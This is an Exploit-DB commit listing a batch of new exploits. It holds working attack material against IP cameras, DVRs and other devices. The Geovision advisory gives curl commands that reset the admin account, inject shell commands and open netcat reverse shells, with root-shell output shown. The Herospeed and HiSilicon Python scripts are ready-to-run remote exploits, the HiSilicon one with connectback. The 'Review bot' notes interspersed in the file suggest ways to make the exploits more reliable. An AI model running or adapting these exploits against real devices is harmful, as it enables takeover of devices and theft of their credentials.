DB: 2018-02-08
25 changes to exploits/shellcodes
QNAP NAS Devices - Heap Overflow
QNAP NVR/NAS - Buffer Overflow (PoC)
QNAP NVR/NAS Devices - Buffer Overflow (PoC)
Cisco ASA - Crash PoC
Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption
Android - 'getpidcon' Permission Bypass in KeyStore Service
Multiple OEM - 'nsd' Remote Stack Format String (PoC)
HP-UX 11.0 - pppd Stack Buffer Overflow
HP-UX 11.0 - 'pppd' Local Stack Buffer Overflow
SGI IRIX - 'LsD' Multiple Buffer Overflows
SGI IRIX - 'LsD' Multiple Local Buffer Overflows
PostScript Utilities - 'psnup' Argument Buffer Overflow
PostScript Utilities - 'psnup' Local Buffer Overflow
Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Buffer Overflows
Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Local Buffer Overflows
MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation
Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow / Double Free / Unauthorized Access
Geovision Inc. IP Camera & Video - Remote Command Execution
Axis SSI - Remote Command Execution / Read Files
Axis Communications MPQT/PACS - Heap Overflow / Information Leakage
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution
Herospeed - 'TelnetSwitch' Remote Stack Overflow / Overwrite Password / Enable TelnetD
Uniview - Remote Command Execution / Export Config (PoC)
Vitek - Remote Command Execution / Information Disclosure (PoC)
Vivotek IP Cameras - Remote Stack Overflow (PoC)
Dahua Generation 2/3 - Backdoor Access
HiSilicon DVR Devices - Remote Code Execution
JiRos Banner Experience 1.0 - Unauthorised Create Admin
JiRos Banner Experience 1.0 - Unauthorized Create Admin
Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting
Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting
Naukri Clone Script - Persistent Cross-Site Scripting
Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting
Online Test Script 2.0.7 - 'cid' SQL Injection
Entrepreneur Dating Script 2.0.2 - Authentication Bypass
parent 2b72bb6e36
commit 2c4b08963a
24 changed files with 3668 additions and 7 deletions
exploits/android/dos/43996.txt (Normal file, 63 lines)
@ -0,0 +1,63 @@
The keystore binder service ("android.security.IKeystoreService") allows users to issue several commands related to key management, including adding, removing, exporting and generating cryptographic keys. The service is accessible to many SELinux contexts, including application contexts, but also unprivileged daemons such as "media.codec".

Binder calls to this service are unpacked by IKeyStoreService (http://androidxref.com/8.0.0_r4/xref/system/security/keystore/IKeystoreService.cpp), and are then passed on to be processed by KeyStoreService. The "generateKey" command is handled by "KeyStoreService::generateKey" (http://androidxref.com/8.0.0_r4/xref/system/security/keystore/key_store_service.cpp#691). Here is a snippet from this function:

1. KeyStoreServiceReturnCode KeyStoreService::generateKey(const String16& name,
2. const hidl_vec<KeyParameter>& params,
3. const hidl_vec<uint8_t>& entropy, int uid,
4. int flags,
5. KeyCharacteristics* outCharacteristics) {
6. uid = getEffectiveUid(uid);
7. KeyStoreServiceReturnCode rc =
8. checkBinderPermissionAndKeystoreState(P_INSERT, uid, flags & KEYSTORE_FLAG_ENCRYPTED);
9. if (!rc.isOk()) {
10. return rc;
11. }
12. if ((flags & KEYSTORE_FLAG_CRITICAL_TO_DEVICE_ENCRYPTION) && get_app_id(uid) != AID_SYSTEM) {
13. ALOGE("Non-system uid %d cannot set FLAG_CRITICAL_TO_DEVICE_ENCRYPTION", uid);
14. return ResponseCode::PERMISSION_DENIED;
15. }
16.
17. if (containsTag(params, Tag::INCLUDE_UNIQUE_ID)) {
18. if (!checkBinderPermission(P_GEN_UNIQUE_ID)) return ResponseCode::PERMISSION_DENIED;
19. }
20. ...
21. }

Like most KeyStore calls, this method uses "KeyStoreService::checkBinderPermission" in order to validate the calling process's permissions. This function uses a twofold approach to verify the caller (http://androidxref.com/8.0.0_r4/xref/system/security/keystore/key_store_service.cpp#checkBinderPermission):

1. The caller's UID is retrieved using IPCThreadState::self()->getCallingUid() and compared against an array of pre-populated UIDs and permissions ("user_perms")
1.1 If the UID matches any in the array, its permission set is retrieved from the array
1.2 If the UID isn't in the array, the default permission set is used ("DEFAULT_PERMS")
2. The caller's SELinux context is retrieved using getpidcon(...) using the PID from the binder transaction (IPCThreadState::self()->getCallingPid())
2.1 An SELinux access check is performed for the given context and operation

Specifically to our case, if a "generateKey" command is called with a "INCLUDE_UNIQUE_ID" tag, the KeyStore will use an attestation certificate for the generated key with an application-scoped and time-bounded device-unique ID. Since creating attestation keys is a privileged operation, it should not be carried out by any user.

This restriction is enforced using the SELinux context enforcement alone -- the "default" permission set ("DEFAULT_PERMS") contains the aforementioned permission:

static const perm_t DEFAULT_PERMS = static_cast<perm_t>(
P_GET_STATE | P_GET | P_INSERT | P_DELETE | P_EXIST | P_LIST | P_SIGN | P_VERIFY |
P_GEN_UNIQUE_ID /* Only privileged apps can do this, but enforcement is done by SELinux */);

As noted in the comment above, this API is restricted to "priv_app" SELinux contexts, which is enforced using validation #2 above.

However, using the calling PID in order to enforce access controls in binder calls is an invalid approach. This is since the calling PID can transition from zombie to dead, allowing other PIDs to take its place. Therefore, the following attack flow is possible:

1. Process A forks and creates process B
2. Process A cycles pids until it reaches the pid before its own
3. Process B issues a binder transaction for the KeyStore service, containing an INCLUDE_UNIQUE_ID tag
4. Process A kills process B, allowing it to transition to dead
5. Process A spawns a new "priv_app" instance, occupying process B's PID

If points 4-5 are completed before the KeyStore service performs the "getpidcon" call, the permission check will use the new app's SELinux context, allowing the access control checks to pass. Otherwise, since no ill effects happen if the race fails, an attacker can continue issuing calls until the race succeeds.

As for spawning a new "priv_app" instance, this can be achieved by issuing a query request to a content provider published by a "priv_app". Many such providers exist (the contacts provider, telephony provider, settings provider, etc.). In this case, I chose to use the "calendar" provider, as it was not running on the device to begin with (and is therefore had to be spawned in order to handle the query request).

In order to expand the timing window for the PoC, I've added a "sleep" call to the KeyStore service's "generateKey" call. You can find the patch under "keystore.diff".

After applying the patch, the attached PoC should be built as part of the Android source tree, by extracting the source files into "frameworks/native/cmds/keystorerace", and running a build (e.g., "mmm keystorerace"). The resulting binary ("keystorerace") contains the PoC code. Running it should result in a new device-unique key being generated, despite not being executed from a "priv_app".


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43996.zip
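Review bot: the write-up refers to a "keystore.diff" patch and to PoC sources to be placed under "frameworks/native/cmds/keystorerace", but neither is part of this commit; only the text file is added and the material exists solely behind the bin-sploits zip link, so the txt should state that the sleep patch widens the race window artificially and that, against an unmodified service, the call has to be repeated until the race is won (the paragraph beginning "If points 4-5 are completed" already implies this). The remediation side is undocumented as well: the text establishes that the SELinux context must not be looked up through a PID that can be recycled between the binder transaction and the getpidcon() call, so a sentence saying that the correct check has to bind the caller's security context to the transaction itself rather than to getCallingPid() would make the advisory usable by platform maintainers, and a reference to the upstream bug or fixed build would help readers verify whether a device is patched.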
exploits/hardware/dos/43986.py (Executable file, 35 lines)
@ -0,0 +1,35 @@
#
# Cisco ASA CVE-2018-0101 Crash PoC
#
# We basically just read:
# https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf
#
# @zerosum0x0, @jennamagius, @aleph___naught
#

import requests, sys

headers = {}
headers['User-Agent'] = 'Open AnyConnect VPN Agent
v7.08-265-gae481214-dirty'
headers['Content-Type'] = 'application/x-www-form-urlencoded'
headers['X-Aggregate-Auth'] = '1'
headers['X-Transcend-Version'] = '1'
headers['Accept-Encoding'] = 'identity'
headers['Accept'] = '*/*'
headers['X-AnyConnect-Platform'] = 'linux-64'
headers['X-Support-HTTP-Auth'] = 'false'
headers['X-Pad'] = '0000000000000000000000000000000000000000'

xml = """<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="a" type="a" aggregate-auth-version="a">
<host-scan-reply>A</host-scan-reply>
</config-auth>
"""

r = requests.post(sys.argv[1], data = xml, headers = headers, verify=False,
allow_redirects=False)

print(r.status_code)
print(r.headers)
print(r.text)
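Review bot: the `headers['User-Agent']` assignment is split across two physical lines (`'Open AnyConnect VPN Agent` followed by `v7.08-265-gae481214-dirty'`), which leaves an unterminated string literal and makes the file a SyntaxError as committed (the hunk count of 35 lines confirms the break is in the file, not a display wrap); the two fragments need to be joined into one line. Secondary points: `sys.argv[1]` is read without an argument-count check, so running the script with no URL dies with an IndexError instead of a usage message, and `verify=False` emits an InsecureRequestWarning on every call unless urllib3 warnings are silenced. For anyone using this to validate a patch, the header comment should also say which response (or lack of one) indicates the device is still vulnerable, since the script only prints whatever comes back.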
exploits/hardware/remote/43982.txt (Normal file, 244 lines)
@ -0,0 +1,244 @@
[STX]

Subject: Geovision Inc. IP Camera/Video/Access Control Multiple Remote Command Execution - Multiple Stack Overflow - Double free - Unauthorized Access

Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (November 2017)
PoC: https://github.com/mcw0/PoC
Python PoC: https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py
Release date: February 1, 2018
Full Disclosure: 90 days

Vendor URL: http://www.geovision.com.tw/
Updated FW: http://www.geovision.com.tw/download/product/

heap: Executable + Non-ASLR
stack: Executable + ASLR

Vulnerable:
Practically more or less all models and versions with FW before November/December 2017 of Geovision embedded IP devices suffer from one or more of these vulnerabilities.

Verified:
GV-BX1500 v3.10 2016-12-02
GV-MFD1501 v3.12 2017-06-19

Timeline:
November 5, 2017: Initiated contact with Geovision
November 6, 2017: Response from Geovision
November 8, 2017: Informed Geovision about quite dangerous bug in 'FilterSetting.cgi'
November 8, 2017: Responce from Geovision
November 15, 2017: Reached out to Geovision to offer more time until FD
(due to the easy exploiting and number of vulnerabilities in large number of products)
November 17, 2017: Request from Geovision to have time to end of January 2018
November 18, 2017: Agreed to FD date of February 1, 2018
November 20, 2017: Received one image for test purposes
November 26, 2017: ACK to Geovision that image looks good
January 16, 2018: Sent this FD and PoC Python to Geovision for comments before FD, if any objections.
January 17, 2018: Received all OK from Geovision, no objections, toghether with thanks for the effort for trying to make Geovision products more safe.
January 17, 2018: Thanked Geoviosion for good cooperation.
February 1, 2018: Full disclosure


-[Unathorized Access]-

1)
PoC: Reset and change 'admin' to 'root' with passwd 'PWN' (GV-MFD1501 v3.12 2017-06-19)
curl -v http://192.168.57.20:80/UserCreat.cgi?admin_username=root\&admin_passwordNew=PWN

2)
PoC: Change device WebGUI language back to default
curl -v -X POST http://192.168.57.20:80/LangSetting.cgi -d lang_type=0\&submit=Apply

3)
Unathorized upgrade of firmware.
PoC: Reboot the remote device as in 'run_upgrade_prepare'
curl -v "http://192.168.57.20:80/geo-cgi/sdk_fw_update.cgi"
URI: http://192.168.57.20/ssi.cgi/FirmwareUpdate.htm

4)
PoC: Upload of Firmware header for checking correct firmware.
curl -v -X PUT "http://192.168.57.20:80/geo-cgi/sdk_fw_check.cgi" -d "BAAAALAAAAABAgAAAAAAADKvfBIAAAABGDIpBwAAAABhc19jcmZpZAAAAAAAAAAALgYAALAAAADXe///AAAAAAAAAABib290bG9hZGVyLmJpbgAAAAA0ALAAAgBOAP//AAAAAAAAAAB1SW1hZ2UAAAAAAAAAAAAA1OIaALAANgDSw///AAAAAAAAAAByYW1kaXNrLmd6AAAAAAAAALBtArAAUgAIuf//AAAAAAAAAAAjIFN0YXJpbmcgd2l0aCAnSElEOicgYW5kIHNwbGl0IGJ5ICcsJyBhbmQgZW5kIHdpdGggJ1xyXG4nICgweDBkIDB4MGEpDQpISUQ6MTE3MCxOYW1lOkdWLUxQQzIyMTAsRG93blZlcjoxMDINCkhJRDoxMTUwLE5hbWU6R1YtUFBUWjczMDBfU0QsRG93blZlcjozMDUNCkhJRDoxMTUyLE5hbWU6R1YtUFBUWjczMDBfRkUsRG93blZlcjozMDUNCkhJRDoxMTc2LE5hbWU6R1YtQlgzNDAwRSxEb3duVmVyOjMwMw0KSElEOjExNzUsTmFtZTpHVi1CWDE1MDBFLERvd25WZXI6MzAzDQpISUQ6MTEwMSxOYW1lOkdWLVVORkUyNTAzLERvd25WZXI6MzA2DQpISUQ6MTE0NSxOYW1lOkdWLVVOMjYwMCxEb3c="

/var/log/messages
192.168.57.1 - - [01/Jan/1970:00:32:43 +0000] "PUT /geo-cgi/sdk_fw_check.cgi HTTP/1.1" 200 25000 "" "curl/7.38.0"
Nov 5 17:11:51 thttpd[1576]: (1576) cgi[3734]: Spawned CGI process 1802 to run 'geo-cgi/sdk_fw_check.cgi', query[]
Nov 5 17:11:51 sdk_fw_check.cgi: CONTENT_LENGTH = 684
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[183]: base64 encode length : 684
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[184]: base64 encode output : BAAAALAAAAABAgAAAAAAADKvfBIAAAABGDIpBwAAAABhc19jcmZpZAAAAAAAAAAALgYAALAAAADXe///AAAAAAAAAABib290bG9hZGVyLmJpbgAAAAA0ALAAAgBOAP//AAAAAAAAAAB1SW1hZ2UAAAAAAAAAAAAA1OIaALAANgDSw///AAAAAAAAAAByYW1kaXNrLmd6AAAAAAAAALBtArAAUgAIuf//AAAAAAAAAAAjIFN0YXJpbmcgd2l0aCAnSElEOicgYW5kIHNwbGl0IGJ5ICcsJyBhbmQgZW5kIHdpdGggJ1xyXG4nICgweDBkIDB4MGEpDQpISUQ6MTE3MCxOYW1lOkdWLUxQQzIyMTAsRG93blZlcjoxMDINCkhJRDoxMTUwLE5hbWU6R1YtUFBUWjczMDBfU0QsRG93blZlcjozMDUNCkhJRDoxMTUyLE5hbWU6R1YtUFBUWjczMDBfRkUsRG93blZlcjoz
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[185]: decode length : 512
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[186]: decode output : ^D
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) check_image_format_is_OK[839]: (1) Product Error: Image's magic[513] != DEV_MAGIC[1000]
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) check_firmware[135]: ERROR : check firmware, length [512]

5)
Unathorized access of 'sdk_config_set.cgi' to Import Setting (SDK_CONFIG_SET)
curl -v -X PUT "http://192.168.57.20:80/geo-cgi/sdk_config_set.cgi"

6)
/PSIA/
Access to GET (read) and PUT (write)
curl -v -X PUT http://192.168.57.20:80/PSIA/System/reboot
curl -v -X PUT http://192.168.57.20:80/PSIA/System/updateFirmware
curl -v -X PUT http://192.168.57.20:80/PSIA/System/factoryReset
[...]
List: /PSIA/System/reboot/index
Usage: /PSIA/System/reboot/description
PoC: curl -v -X PUT http://192.168.57.20:80/PSIA/System/reboot
Full recursive list: /PSIA/indexr


-[Remote Command Execution]-

7)
PoC will create 'tmp/Login.cgi' with '<!--#include file="SYS_CFG"-->', then Dump All Settings,
including login and passwords in clear text by accessing the created Login.htm

curl -v "http://192.168.57.20:80/PictureCatch.cgi?username=GEOVISION&password=%3becho%20%22%3c%21--%23include%20file=%22SYS_CFG%22--%3e%22%3etmp/Login.htm%3b&data_type=1&attachment=1&channel=1&secret=1&key=PWNED" ; curl -v "http://192.168.57.20:80/ssi.cgi/tmp/Login.htm"

< HTTP/1.1 200 OK
...
-------------------------------------
- -
- Dump All Settings -
- -
-------------------------------------
...


8)
PoC will pop reverse connect back shell to 192.168.57.1

/www/PictureCatch.cgi
curl -v "http://192.168.57.20:80/PictureCatch.cgi?username=GEOVISION\&password=%3bmkfifo%20/tmp/s0%3bnc%20-w%205%20192.168.57.1%201337</tmp/s0|/bin/sh>/tmp/s0%202>/tmp/s0%3brm%20/tmp/s0%3b\&data_type=1\&attachment=1\&channel=1\&secret=1\&key=PWNED"

$ ncat -vlp 1337
Ncat: Version 7.12 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:55331.
pwd
/www
id
uid=0(root) gid=0(root)
exit
$

9)
/www/JpegStream.cgi
curl -v "http://192.168.57.20:80/JpegStream.cgi?username=GEOVISION\&password=%3bmkfifo%20/tmp/s0%3bnc%20-w%205%20192.168.57.1%201337</tmp/s0|/bin/sh>/tmp/s0%202>/tmp/s0%3brm%20/tmp/s0%3b\&data_type=1\&attachment=1\&channel=1\&secret=1\&key=PWNED"

$ ncat -vlp 1337
Ncat: Version 7.12 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:55332.
pwd
/www
id
uid=0(root) gid=0(root)
exit
$

Problem(s):
SIiUTIL_GetDecryptData calling popen() "sh -c /var/www/testbf d PWNED ;mkfifo /tmp/s0;..." without proper sanitation of user input

Note:
Vulnerable tags: 'username', 'password' and 'key'


-[Double free]-

10)
curl -v http://192.168.57.20:80/PSIA/System/configurationData
*** glibc detected *** psia.cgi: double free or corruption (out): 0x00077d10 ***

-[Stack Overflow]-

11)
/usr/local/thttpd
curl -v "http://192.168.57.20:80/htpasswd?password=`for((i=0;i<140;i++));do echo -en "X";done`AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII"

Program received signal SIGSEGV, Segmentation fault.
0x49494948 in ?? ()
(gdb) bt
#0 0x49494948 in ?? ()
#1 0x0003889c in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) i reg
r0 0x0 0
r1 0x369650 3577424
r2 0x1 1
r3 0x68 104
r4 0x41414141 1094795585
r5 0x42424242 1111638594
r6 0x43434343 1128481603
r7 0x44444444 1145324612
r8 0x45454545 1162167621
r9 0x46464646 1179010630
r10 0x47474747 1195853639
r11 0x48484848 1212696648
r12 0x3680e8 3571944
sp 0x7ee0fbc8 0x7ee0fbc8
lr 0x3889c 231580
pc 0x49494948 0x49494948
cpsr 0x20000030 536870960
(gdb)

12)
/usr/local/thttpd
curl -v http://192.168.57.20:80/geo-cgi/param.cgi?skey=`for((i=0;i<44;i++)); do echo -en "X"; done`AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNN

Program received signal SIGSEGV, Segmentation fault.
0x49494948 in ?? ()
(gdb) bt
#0 0x49494948 in ?? ()
#1 0x3e4c4d54 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) i reg
r0 0xffffffff 4294967295
r1 0x7e963e8c 2123775628
r2 0x0 0
r3 0x242 578
r4 0x41414141 1094795585
r5 0x42424242 1111638594
r6 0x43434343 1128481603
r7 0x44444444 1145324612
r8 0x45454545 1162167621
r9 0x46464646 1179010630
r10 0x47474747 1195853639
r11 0x48484848 1212696648
r12 0xa 10
sp 0x7e983c48 0x7e983c48
lr 0x3e4c4d54 1045187924
pc 0x49494948 0x49494948
cpsr 0x60000030 1610612784
(gdb)

13)
/www/PictureCatch.cgi
curl -v "http://192.168.57.20:80/PictureCatch.cgi?username=`for((i=0;i<324;i++));do echo -en "A";done`BBBB&password=GEOVISION&data_type=1&attachment=1&channel=1&secret=1&key=PWNED"

[pid 2215] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---

14)
/www/Login3gpp.cgi
curl -v "http://192.168.57.20:80/Login3gpp.cgi?username=`for((i=0;i<444;i++));do echo -en "A";done`BBBB&password=PWNED"

[pid 2161] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424243} ---

15)
/www/Login.cgi
curl -v "http://192.168.57.20:80/Login.cgi?username=`for((i=0;i<477;i++));do echo -en "A";done`BBBB&password=PWNED"

[pid 2135] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---

Note: username and password uses strcpy() and both are vulnerable.
However, 'password' cannot be used remotely since 'thttpd' checking for this, and is vulnerable for stack overflow.

Have a nice day
/bashis

[ETX]
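Review bot: the closing note under 15) is ambiguous as written ("'password' cannot be used remotely since 'thttpd' checking for this, and is vulnerable for stack overflow"): it reads as if the check itself were the overflow, whereas 11) shows thttpd crashing on the `htpasswd?password=` request with pc at 0x49494948; the note should say plainly which component overflows on `password` (thttpd, before the CGI is reached) and that the CGI-side strcpy() is therefore reachable only through `username`. The "Problem(s)" line under 9) names SIiUTIL_GetDecryptData and popen() but the same root cause is never tied back to items 1) to 6), which are authorization gaps rather than input handling; a one-line cause per section (missing authentication on the CGI/PSIA endpoints versus unsanitized popen() arguments versus strcpy() into fixed stack buffers) would let a reader map each item to a distinct fix. Remediation information is limited to "FW before November/December 2017" and the vendor download link; naming the firmware version that resolved the two verified models would make the advisory actionable for device owners. Spelling slips in the timeline and section titles ("Responce", "toghether", "Geoviosion", "Unathorized") should be corrected.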
exploits/hardware/remote/43983.py (Executable file, 1090 lines): file diff suppressed because it is too large
exploits/hardware/remote/43997.py (Executable file, 179 lines)
@ -0,0 +1,179 @@
#!/usr/bin/env python2.7
#
# Herospeed TelnetSwitch daemon running on TCP/787, for allowing enable of the telnetd.
# Where one small stack overflow allows us to overwrite the dynamicly generated password and enable telnetd.
#
# [Verified]
# 1) Fullhan IPC FH8830_F22_W_7.1.42.1
# 2) Fullhan FH8830_AR0330_FISHEYE_W_7.1.37.5
# 3) HiSilicon 3518EV200_OV9732_W_7.1.25.1, 3519V100_IMX274_W_7.1.39.3
# 4) Ambarella s2l55m_imx123_W_7.1.25.2, S2E66_IMX178_W_7.1.3.4
#
# Author: bashis <mcw noemail eu>, 2018
#
import socket
import select
import sys
import argparse
import base64
import struct
import time
#
# Validate correctness of HOST, IP and PORT
#
class Validate:

def __init__(self,verbose):
self.verbose = verbose

# Check if IP is valid
def CheckIP(self,IP):
self.IP = IP

ip = self.IP.split('.')
if len(ip) != 4:
return False
for tmp in ip:
if not tmp.isdigit():
return False
i = int(tmp)
if i < 0 or i > 255:
return False
return True

# Check if PORT is valid
def Port(self,PORT):
self.PORT = PORT

if int(self.PORT) < 1 or int(self.PORT) > 65535:
return False
else:
return True

# Check if HOST is valid
def Host(self,HOST):
self.HOST = HOST

try:
# Check valid IP
socket.inet_aton(self.HOST) # Will generate exeption if we try with DNS or invalid IP
# Now we check if it is correct typed IP
if self.CheckIP(self.HOST):
return self.HOST
else:
return False
except socket.error as e:
# Else check valid DNS name, and use the IP address
try:
self.HOST = socket.gethostbyname(self.HOST)
return self.HOST
except socket.error as e:
return False


if __name__ == "__main__":

INFO = '\n[Herospeed TelnetSwitch pwn (2018 bashis <mcw noemail eu>)]\n'
rhost = '192.168.57.20' # Default Remote HOST
rport = 787 # Default Remote PORT
BUFFER_SIZE = 1024

try:
arg_parser = argparse.ArgumentParser(
prog=sys.argv[0],
description=('[*] '+ INFO +' [*]'))
arg_parser.add_argument('--rhost', required=True, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ str(rport) +']')
args = arg_parser.parse_args()
except Exception as e:
print INFO,"\nError: {}\n".format(str(e))
sys.exit(1)

print INFO
if args.rport:
rport = int(args.rport)

if args.rhost:
rhost = args.rhost
IP = args.rhost

# Check if RPORT is valid
if not Validate(True).Port(rport):
print "[!] Invalid RPORT - Choose between 1 and 65535"
sys.exit(1)

# Check if RHOST is valid IP or FQDN, get IP back
rhost = Validate(True).Host(rhost)
if not rhost:
print "[!] Invalid RHOST"
sys.exit(1)

timeout = 5
socket.setdefaulttimeout(timeout)

#
# [Payload]
#

LOGIN = "Lucky787" # Hardcoded login
#
# Fullhan IPC FH8830_F22_W_7.1.42.1
# Fullhan FH8830_AR0330_FISHEYE_W_7.1.37.5
#
PASSWD = "\n\n\n\n\n\n\n\n\n\n\n\n" # Our new password, must be exactly 12 char, and must be '\n'
MESSAGE = ''+ LOGIN + ':' + PASSWD +''
BASE64_NULL = "A" * 232 # Decoded as 0x00 with base64 decode
HEAP_PWD = 0x00016c8c # Start of the dynamicly generated password, located on heap

#
# HiSilicon 3518EV200_OV9732_W_7.1.25.1
#
# PASSWD = "AAAAAAAAAAAA" # Our new password, must be exactly 12 char, and must be 'A'
# MESSAGE = ''+ LOGIN + ':' + PASSWD +''
# BASE64_NULL = "A" * 364 # Decoded as 0x00 with base64 decode
# HEAP_PWD = 0x00016990 # Start of the dynamicly generated password, located on heap

#
# HiSilicon 3519V100_IMX274_W_7.1.39.3
#
# PASSWD = "AAAAAAAAAAAA" # Our new password, must be exactly 12 char, and must be 'A'
# MESSAGE = ''+ LOGIN + ':' + PASSWD +''
# BASE64_NULL = "A" * 364 # Decoded as 0x00 with base64 decode
# HEAP_PWD = 0x000267b0 # Start of the dynamicly generated password, located on heap

#
# Ambarella s2l55m_imx123_W_7.1.25.2
#
# PASSWD = "AAAAAAAAAAAA" # Our new password, must be exactly 12 char, and must be 'A'
# MESSAGE = ''+ LOGIN + ':' + PASSWD +''
# BASE64_NULL = "A" * 364 # Decoded as 0x00 with base64 decode
# HEAP_PWD = 0x00014c3c # Start of the dynamicly generated password, located on heap

#
# Ambarella S2E66_IMX178_W_7.1.3.4
#
# PASSWD = "AAAAAAAAAAAA" # Our new password, must be exactly 12 char, and must be 'A'
# MESSAGE = ''+ LOGIN + ':' + PASSWD +''
# BASE64_NULL = "A" * 108 # Decoded as 0x00 with base64 decode
# HEAP_PWD = 0x00014c68 # Start of the dynamicly generated password, located on heap

MESSAGE = base64.b64encode(bytes(MESSAGE))
MESSAGE += BASE64_NULL

#
# Since the stack overflow writing with only one byte, we need overwrite the password one char at the time (looping twelve times)
#
for where in range(0, len(PASSWD)):
OUT = "GET / HTTP/1.0\nAuthorization: Basic {}{}\n\n".format(MESSAGE,struct.pack('<L',HEAP_PWD)[:3])
print "Writing to: {}".format(hex(HEAP_PWD))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rhost, rport))
s.send(OUT)
time.sleep(0.5)
response = s.recv(BUFFER_SIZE).split()
HEAP_PWD += 0x1 # Next address on heap

if response[1]:
if response[1] == "200":
print "({}) OK, telnetd should be open!".format(response[1])
break
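Review bot: `response = s.recv(BUFFER_SIZE).split()` followed by `if response[1]:` raises IndexError whenever the daemon answers with an empty or single-token reply, and since `socket.setdefaulttimeout(timeout)` is set, a silent peer raises an uncaught `socket.timeout` from `recv()`; guard the index (`if len(response) > 1 and response[1] == "200":`) and wrap connect/send/recv in a try/except so a non-responding device is reported rather than crashing the loop. The socket is never closed between iterations, so up to twelve connections stay open until interpreter exit. `rport = int(args.rport)` runs before `Validate(True).Port(rport)`, so a non-numeric `--rport` dies with a ValueError instead of the "[!] Invalid RPORT" message; the `--rport` help text also says "HTTP/HTTPS Port" although the default 787 is the TelnetSwitch port. `select` is imported but unused, the `as e` bindings in `Host()` are unused, and the per-target constants (`BASE64_NULL` length, `HEAP_PWD`) are selected by commenting blocks in and out, which invites running the wrong profile against a device; a `--target` option mapping the four verified builds to their values would be safer.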
exploits/hardware/remote/44004.py (Executable file, 297 lines)
@ -0,0 +1,297 @@
#!/usr/bin/env python2
#
# pwn hisilicon dvr web service
#

from pwn import *
from time import sleep
import re
import argparse
import os

parser = argparse.ArgumentParser(description='exploit HiSilicon DVR devices')
parser.add_argument('--rhost', help='target host', required=True)
parser.add_argument('--rport', help='target port', default=80)
parser.add_argument('--lhost', help='connectback ip', required=True)
parser.add_argument('--lport', help='connectback port', default=31337)
parser.add_argument('--bhost', help='listen ip to bind (default: connectback)')
parser.add_argument('--bport', help='listen port to bind (default: connectback)')
parser.add_argument('-n', '--nolisten', help='do not start listener (you should care about connectback listener on your own)', action='store_true')
parser.add_argument('-i', '--interactive', help='select stack memory region interactively (rather than using autodetection)', action='store_true')
parser.add_argument('-p', '--persistent', help='make connectback shell persistent by restarting dvr app automatically (DANGEROUS!)', action='store_true')
parser.add_argument('-u', '--upload', help='upload tools (now hardcoded "./tools/dropbear" in script) after pwn', action='store_true')
parser.add_argument('--offset', help='exploit param stack offset to mem page base (default: 0x7fd3d8)', default=0x7fd3d8)
parser.add_argument('--cmdline', help='cmdline of Sofia binary on remote target (default "/var/Sofia")', default='/var/Sofia')

args = parser.parse_args()

target_host = args.rhost
target_port = int(args.rport)

sofia_cmdline = args.cmdline

if args.interactive:
getleak_interactive = True
else:
getleak_interactive = False

if args.persistent:
shell_persistent = True
else:
shell_persistent = False

if args.upload:
shell_upload = True
else:
shell_upload = False

connectback_host = args.lhost
connectback_port = int(args.lport)

if args.bhost:
listen_host = args.bhost
else:
listen_host = connectback_host
if args.bport:
listen_port = int(args.bport)
else:
listen_port = connectback_port


"""
vuln1: bof in httpd
-------------------
buffer overflow in builtin webserver binary `Sofia`
which can be exploited to run shellcode (as root) on the device.

PoC payload to cause a segfault:
payload = "GET " + "a"*299 + "xxxx" + " HTTP"

note, that in "xxxx" we can control pc register (program flow)!

there is no nx enabled, so executing shellcode in place of "a"*299
is possible. however, stack address leak is needed to defeat aslr.

vuln2: path traversal vuln in httpd
-----------------------------------
builtin webserver has a directory path traversal vulnerability
which can be exploited to leak arbitrary files.
note, that the webserver binary `Sofia` is running as root,
so exploiting this arbitrary file can be read from device fs.

PoC request "GET ../../etc/passwd HTTP" reads file "/etc/passwd".
Furthermore, dir listing is enabled as well.

by exploiting vuln2 we can defeat aslr needed to exploit vuln1.
namely, filesystem at /proc contains lots of information
about running processes, e.g. contains memory mappings:
request "GET ../../proc/[pid]/maps HTTP" reads memory
mapping of process with pid [pid]. obverving the memory
mapping patterns usually enough to defeat aslr (offset
from mem map base is the same, even in different versions).
"""

# get pid of running dvr binary '/var/Sofia'
def findpid():
with log.progress('getting pidlist') as logp:
c = context.log_level
context.log_level = 'error'
r = remote(target_host, target_port)
r.sendline('GET ../../proc HTTP')
